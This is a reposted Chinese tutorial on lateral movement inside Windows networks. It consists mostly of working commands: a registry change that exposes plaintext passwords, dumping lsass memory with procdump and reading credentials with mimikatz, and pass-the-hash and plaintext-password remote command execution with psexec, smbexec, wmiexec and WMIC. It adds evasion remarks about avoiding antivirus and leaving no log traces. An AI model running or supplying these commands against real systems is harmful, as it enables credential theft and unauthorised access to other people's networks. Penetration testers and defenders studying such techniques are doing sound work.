碼上快樂

相關內容    簡體    繁體

內網滲透-橫向移動(smb&wmi)

本文轉載自   查看原文   2021-05-17 22:05   1257    smb&wmi/ 橫向移動/ 內網滲透

內網滲透-橫向移動(smb&wmi)

#前置知識點1:

windows 2012以上版本默認關閉wdigest導致無法從內存中獲取明文密碼

windows 2012以下版本如安裝KB2871997補丁同上

針對以上情況,提供了4種方法解決:

1.利用hash傳遞(pth,ptk等)進行移動
2.利用其他服務協議(smb,wmi)進行移動
3.利用注冊表操作開啟Wdigest Auth值進行獲取
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重啟或用戶重新登錄后可以成功抓取
4.利用工具或第三方平台(Hashcat)進行破解獲取

#前置知識點2:

windows系統LM HASH及NTLM Hash加密算法,個人系統在Windows vista后

服務器系統在Windows 2003以后,認證方式均為NTLM Hash

#Procdump+Mimikatz配合獲取NTML&hash

#procdump上執行:
​
procdump -accepteula -ma lsass.exe lsass.dmp
​
#mimikatz上執行:
sekurlsa::minidump lsass.dmp
sekurlsa::LogonPasswords full

 

procdump為微軟官方軟件,不會被殺毒軟件攔截,但是生成的dmp文件會。

 

#SMB服務利用(psexec,smbexec)傳遞hash

利用條件:445端口開放
#psexec的使用:
情況一:已經建立了$ipc連接
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator#建立了ipc連接
psexec \\192.168.3.32 -s cmd #-s參數為以system權限運行

 

情況二:未建立ipc,直接提供明文賬號密碼(不能直接傳遞hash)
#明文
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
#hash
psexec -hashes :$HASH$ ./administrator@10.1.2.3 #本地admin用戶hash傳遞
psexec -hashes :$HASH$ xxx.com/administrator@10.1.2.3 #域admin用戶hash傳遞
psexec -hashes :518b98ad417a53695dc997aa02d455c xxx.com/administrator@192.168.3.32 #hash傳遞需要第三方包impacket

 

#第三方包impacket下的smbexec實現無需ipc鏈接傳遞明文或hash
#明文
smbexec god/administrator:Admin12345@192.168.3.21  #域用戶
smbexec ./administrator:admin12345@192.168.3.32  #本地用戶
#hash
smbexec -hashes :$HASH$ ./administrator@192.168.3.21 #本地用戶hash傳遞
smbexec -hashes :$HASH$ xxx.com/admin@192.168.3.21 #域用戶hash傳遞
​
smbexec -hashes :518b98ad417a53695dc997aa02d455c 
xxx.com/administrator@192.168.3.32                  #本地用戶hash傳遞
smbexec -hashes :518b98ad417a53695dc997aa02d455c ./administrator@192.168.3.32
#域用戶hash傳遞

 

#WMI服務利用(cscript,wmiexec,wmic)

WMI(Windows Management Instrumentation)通過135端口進行利用
支持用戶名明文或者hash的方式進行認證,並且該方法不會在目標日志系統留下痕跡。
#自帶WMIC 明文傳遞,無回顯
wimc /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >c:\1.txt"
 
#自帶cscript 明文傳遞,有回顯
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345
 
#impacket-wmiexec 明文或hash傳遞 有回顯
#明文
wmiexec ./administrator:Admin12345@192.168.3.32 "whoami"    #本地用戶
wmiexec xxx.com/administrator:Admin12345@192.168.3.21 "whoami"  #域用戶
#hash
wmiexec -hashes :518b98ad417a53695dc997aa02d455 ./administrator@192.168.3.32 "whoami"   #本地用戶
wmiexec -hashes :518b98ad417a53695dc997aa02d455 xxx.com/administrator@192.168.3.21 "whoami" #域用戶

 

 




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 內網滲透——PTH,SMB及WMI橫向移動 內網安全3-域橫向smb&wmi明文或hash傳遞 六十七:內網安全-域橫向smb&wmi明文或hash傳遞 67:內網安全-域橫向smb&wmi明文或hash傳遞 內網滲透-橫向移動($IPC&at&schtasks) 【內網滲透】— 域內橫向移動分析及防御(7) 內網滲透測試:內網橫向移動基礎總結 內網橫向移動之LocalAccountTokenFilterPolicy 內網橫向滲透的部分思路 內網安全攻防:滲透測試指南——第5章域內橫向移動分析及防御
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM